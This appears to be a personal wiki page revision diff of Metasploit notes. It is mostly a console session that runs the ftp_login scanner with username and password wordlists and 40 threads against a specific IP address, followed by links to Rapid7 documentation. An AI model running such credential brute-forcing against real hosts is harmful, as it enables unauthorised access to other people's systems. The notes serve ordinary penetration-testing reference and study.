Difference between revisions of "Metasploit"
Jump to navigation
Jump to search
Rafahsolis (talk | contribs) (Created page with "= FTP = <nowiki> msf > search ftp_login Matching Modules ================ Name Disclosure Date Rank Description ----...") |
Rafahsolis (talk | contribs) |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 9: | Line 9: | ||
auxiliary/scanner/ftp/ftp_login | auxiliary/scanner/ftp/ftp_login | ||
msf > use auxiliary/scanner/ftp/ftp_login | msf > use auxiliary/scanner/ftp/ftp_login | ||
| − | msf auxiliary(ftp_login) > set pass_file / | + | msf auxiliary(ftp_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt |
pass_file => /opt/framework/msf3/data/wordlists/unix_passwords.txt | pass_file => /opt/framework/msf3/data/wordlists/unix_passwords.txt | ||
| − | msf auxiliary(ftp_login) > set user_file / | + | msf auxiliary(ftp_login) > set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt |
user_file => /opt/framework/msf3/data/wordlists/unix_users.txt | user_file => /opt/framework/msf3/data/wordlists/unix_users.txt | ||
| − | msf auxiliary(ftp_login) > set | + | msf auxiliary(ftp_login) > set rhosts 81.39.212.75 |
| − | + | rhosts => 81.39.212.75 | |
| − | msf auxiliary(ftp_login) > set | + | msf auxiliary(ftp_login) > set threads 40 |
| − | + | msf auxiliary(ftp_login) > run </nowiki> | |
| − | + | ||
| + | = Pro = | ||
| + | https://metasploit.help.rapid7.com/docs/metasploit-basics<br /> | ||
| + | https://metasploit.help.rapid7.com/docs/getting-started<br /> | ||
| + | |||
| + | == Related == | ||
| + | [[Meterpreter]] | ||
Latest revision as of 14:24, 3 April 2018
FTP[edit]
msf > search ftp_login Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/ftp/ftp_login msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt pass_file => /opt/framework/msf3/data/wordlists/unix_passwords.txt msf auxiliary(ftp_login) > set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt user_file => /opt/framework/msf3/data/wordlists/unix_users.txt msf auxiliary(ftp_login) > set rhosts 81.39.212.75 rhosts => 81.39.212.75 msf auxiliary(ftp_login) > set threads 40 msf auxiliary(ftp_login) > run
Pro[edit]
https://metasploit.help.rapid7.com/docs/metasploit-basics
https://metasploit.help.rapid7.com/docs/getting-started